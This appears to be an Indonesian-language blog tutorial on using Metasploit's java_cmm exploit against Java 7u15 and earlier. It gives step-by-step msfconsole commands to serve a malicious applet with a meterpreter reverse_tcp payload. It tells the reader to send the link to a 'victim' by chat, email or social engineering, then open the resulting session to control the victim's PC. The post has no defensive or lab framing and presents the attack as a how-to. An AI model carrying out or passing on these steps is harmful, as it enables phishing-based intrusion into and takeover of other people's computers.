Modul ini merupakan pelanggaran kelas Color Management dari Java Applet untuk menjalankan kode Java tanpa ijin di luar sandbox yang dieksploitasi pada bulan Februari dan Maret 2013. Kerentanan tersebut mempengaruhi Java versi 7u15 dan sebelumnya, 6u41 dan sebelumnya dan telah berhasil diuji pada sistem Windows XP SP3 dan Windows 7 SP1. Mengeksploitasi ini tidak mem-by-pass klik-to-play, sehingga pengguna harus menerima peringatan java untuk menjalankan applet berbahaya.
Exploit
Targets
Java 7 Update 15
Windows PC
Java 7 Update 15
Windows PC
Requirement
Attacker: Kali Linux
Victim PC: Windows 7
Jalankan terminal backtrack / Kali linux dan ketikkan msfconsole
Sekarang ketik use exploit/windows/browser/java_cmm
msf exploit (java_cmm)>set payload windows/meterpreter/reverse_tcp
msf exploit (java_cmm)>set lhost
192.168.1.8 (IP of Local Host)
msf exploit (java_cmm)>set srvhost
192.168.1.8 (alamat komputer lokal)
msf exploit (java_cmm)>set uripath /
(Url yang digunakan untuk exploit ini)
msf exploit (java_cmm)>exploit
Sekarang Anda harus memberikan URL kepada korban Anda http://192.168.1.8:8080
Kirim link server ke korban melalui chatting atau email atau teknik rekayasa sosial lainya.
Sekarang Anda memiliki akses ke PC korban. Gunakan "sessions -l" dan nomor sesi untuk menghubungkan ke sesi. Kemudian Ketik "sessions -i ID". (lihat pada gambar)
Sekarang anda telah berhasil menguasai komputer korban.
0 comments:
Post a Comment